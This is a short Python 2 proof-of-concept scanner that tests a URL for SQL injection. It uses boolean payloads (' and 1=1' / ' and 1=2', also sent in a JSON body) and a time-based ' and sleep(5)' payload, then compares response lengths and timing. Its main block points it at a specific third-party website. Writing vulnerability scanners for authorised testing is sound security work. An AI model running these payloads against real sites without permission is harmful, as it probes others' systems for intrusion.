#coding:utf-8

import requests
import time
from poc import Poc
import json

def Verfic1(url):
	payload = [' and 1=1', ' and 1=2']
	try:
		v1 = requests.get(url).headers.get('Content-Length')
		v2 = requests.get(url+payload[0]).headers.get('Content-Length')
		v3 = requests.get(url+payload[1]).headers.get('Content-Length')
	except:
		return False
	if v1 == v2 and v2 != v3:
		return True
	else:
		return False

def Verfic2(url):
	payload = [' and 1=1', ' and 1=2']
	try:
		v1 = requests.get(url).headers.get('Content-Length')
		v2 = requests.get(url+payload[0]).headers.get('Content-Length')
		v3 = requests.get(url+payload[1]).headers.get('Content-Length')
	except:
		return False
	if v1 == v2 and v2 != v3:
		return True
	else:
		return False

def Verfic3(url):
	payload = ' and sleep(5)'
	t1 = time.time()
	try:
		requests.get(url+payload)
	except:
		return False

	t2 = time.time()
	if t2-t1 > 5:
		return True
	else:
		return False

class Test_sqli(Poc):

	def scan(self, target):
		head = {'Content-Type': 'application/json; charset=utf-8'}
		d1 = {"id":1}
		d2 = {"id":"1 aND 1=1"}
		d3 = {"id":"a aND 1=2"}
		try:
			r1 = requests.post(target, headers=head, data=json.dumps(d1))
			r2 = requests.post(target, headers=head, data=json.dumps(d2))
			r3 = requests.post(target, headers=head, data=json.dumps(d3))
			# Content-Length
		except:
			print "[*]Error requests post error"
			pass

		try:
			if r1.headers["Content-Length"] == r2.headers["Content-Length"]:
				if r2.headers["Content-Length"] != r3.headers["Content-Length"]:
					print "[*]URL:%s is SQL Injection Vulnerbility!" % target
					return True
		except Exception as e:
			pass

		try:
			a = Verfic1(target)
			if a==True:
				return True
			else:
				a = Verfic2(target)
				if a==True:
					return True
				else:
					a = Verfic3(target)
					if a == True:
						return True
		except:
			print "[*]Error requests get error"

		return False

if __name__ == '__main__':
	test =Test_sqli()
	print test.scan("http://www.microtek.com.cn/yingyong/info.php?fid=725")
